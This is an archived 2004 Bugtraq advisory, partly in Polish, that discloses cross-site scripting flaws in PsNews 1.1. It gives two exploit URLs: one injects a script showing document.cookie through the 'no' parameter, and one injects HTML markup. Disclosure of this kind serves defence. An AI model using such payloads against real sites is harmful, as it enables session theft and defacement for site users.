lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040905185256.14049.qmail@www.securityfocus.com> Date: 5 Sep 2004 18:52:56 -0000 From: Michal Blaszczak <wacky@...ponie.org> To: bugtraq@...urityfocus.com Subject: Bug XSS in PsNews 1.1 °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° *5-9-2004 *Autor: wacky *E-mail: wacky@...ponie.org *WWW: http://www.nicponie.org °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° ----------------------------------------------- |Błąd Cross-Site Scripting (XSS) w PsNews 1.1 | ----------------------------------------------- Exploit: a) http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script> b) http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font> °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° http://www.nicponie.org/